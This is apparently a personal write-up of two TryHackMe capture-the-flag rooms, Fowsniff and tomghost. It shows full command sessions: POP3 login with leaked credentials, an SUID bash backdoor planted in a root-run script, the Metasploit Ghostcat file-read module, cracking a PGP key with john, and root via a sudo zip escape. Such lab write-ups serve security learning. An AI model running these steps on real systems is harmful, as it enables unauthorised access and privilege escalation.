THM: Fowsniff and tomghost
THM: Stuff
I’ve been doing a little bit of blue-teaming learning but I wanted to feel like I’d achieved something so I ran through Fowsniff and tomghost. I don’t have much to say about Fowsniff, although I will record the telnet commands used to connect to the POP3 server:
┌──(root💀kali)-[/opt/thm/fowsniff]
└─# telnet fowsniff 110
Trying 10.10.56.108...
Connected to fowsniff.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
USER seina
+OK
PASS scoobydoo2
+OK Logged in.
LIST
+OK 2 messages:
1 1622
2 1280
.
retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
# etcFor the root section, this had a shell script being executed as root during an SSH login. It suggested we send ourselves a root shell but instead I copied bash with the SUID bit and then ran it when I logged in, i.e in the script.
cp /bin/bash /tmp/bash
chmod a+s /tmp/bashThen:
baksteen@fowsniff:~$ /tmp/bash -p
bash-4.3# id;hostname;date
uid=1004(baksteen) gid=100(users) euid=0(root) egid=0(root) groups=0(root),100(users),1001(baksteen)
fowsniff
Wed Jul 14 07:13:45 EDT 2021
bash-4.3#tomghost
The name obviously refers to ghostcat, which is a file read vulnerability in TomCat.
I use MSF, because why not?
msf6 > search ghostcat
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/tomcat_ghostcat 2020-02-20 normal Yes Ghostcat
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/http/tomcat_ghostcat
msf6 > use 0
msf6 auxiliary(admin/http/tomcat_ghostcat) > show options
Module options (auxiliary/admin/http/tomcat_ghostcat):
Name Current Setting Required Description
---- --------------- -------- -----------
AJP_PORT 8009 no The Apache JServ Protocol (AJP) port
FILENAME /WEB-INF/web.xml yes File name
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The Apache Tomcat webserver port (TCP)
SSL false yes SSL
msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts 10.10.106.165
rhosts => 10.10.106.165
msf6 auxiliary(admin/http/tomcat_ghostcat) > run
[*] Running module against 10.10.106.165
Status Code: 200
Accept-Ranges: bytes
ETag: W/"1261-1583902632000"
Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
Content-Type: application/xml
Content-Length: 1261
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:8730281lkjlkjdqlksalks
</description>
</web-app>
[+] 10.10.106.165:8080 - /root/.msf4/loot/20210714072054_default_10.10.106.165_WEBINFweb.xml_635386.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/tomcat_ghostcat) > quitWe got some credentials. This could be for the Tomcat manager app, but let’s try SSH first:
┌──(root💀kali)-[/opt/thm/tomghost]
└─# ssh [email protected]
The authenticity of host '10.10.106.165 (10.10.106.165)' can't be established.
ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.106.165' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
skyfuck@ubuntu:~$ sudo -l
[sudo] password for skyfuck:
Sorry, user skyfuck may not run sudo on ubuntu.
skyfuck@ubuntu:~$Yep. We have some PGP files:
skyfuck@ubuntu:~$ ls -lash
total 40K
4.0K drwxr-xr-x 3 skyfuck skyfuck 4.0K Jul 14 04:21 .
4.0K drwxr-xr-x 4 root root 4.0K Mar 10 2020 ..
4.0K -rw------- 1 skyfuck skyfuck 136 Mar 10 2020 .bash_history
4.0K -rw-r--r-- 1 skyfuck skyfuck 220 Mar 10 2020 .bash_logout
4.0K -rw-r--r-- 1 skyfuck skyfuck 3.7K Mar 10 2020 .bashrc
4.0K drwx------ 2 skyfuck skyfuck 4.0K Jul 14 04:21 .cache
4.0K -rw-rw-r-- 1 skyfuck skyfuck 394 Mar 10 2020 credential.pgp
4.0K -rw-r--r-- 1 skyfuck skyfuck 655 Mar 10 2020 .profile
8.0K -rw-rw-r-- 1 skyfuck skyfuck 5.1K Mar 10 2020 tryhackme.asc
skyfuck@ubuntu:~$We need to exfil the asc file and crack the password:
┌──(root💀kali)-[/opt/thm/tomghost]
└─# scp [email protected]:/home/skyfuck/tryhackme.asc tryhackme.asc
[email protected] password:
tryhackme.asc 100% 5144 15.7KB/s 00:00
┌──(root💀kali)-[/opt/thm/tomghost]
└─# gpg2john tryhackme.asc > tryhackme.john
File tryhackme.asc
┌──(root💀kali)-[/opt/thm/tomghost]
└─# john tryhackme.john -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru (tryhackme)
1g 0:00:00:00 DONE (2021-07-14 07:25) 11.11g/s 11911p/s 11911c/s 11911C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completedAnd then we can extract the encrypted file:
skyfuck@ubuntu:~$ gpg --import tryhackme.asc
gpg: key C6707170: secret key imported
gpg: /home/skyfuck/.gnupg/trustdb.gpg: trustdb created
gpg: key C6707170: public key "tryhackme <[email protected]>" imported
gpg: key C6707170: "tryhackme <[email protected]>" not changed
gpg: Total number processed: 2
gpg: imported: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp
You need a passphrase to unlock the secret key for
user: "tryhackme <[email protected]>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)
gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
"tryhackme <[email protected]>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123jNext, we can su merlin and privesc with zip per GTFOBins:
merlin@ubuntu:/home/skyfuck$ sudo -l
Matching Defaults entries for merlin on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User merlin may run the following commands on ubuntu:
(root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:/home/skyfuck$ TF=$(mktemp -u)
merlin@ubuntu:/home/skyfuck$ sudo -u root /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Wed Jul 14 04:27:21 PDT 2021
#Not difficult but still enjoyable.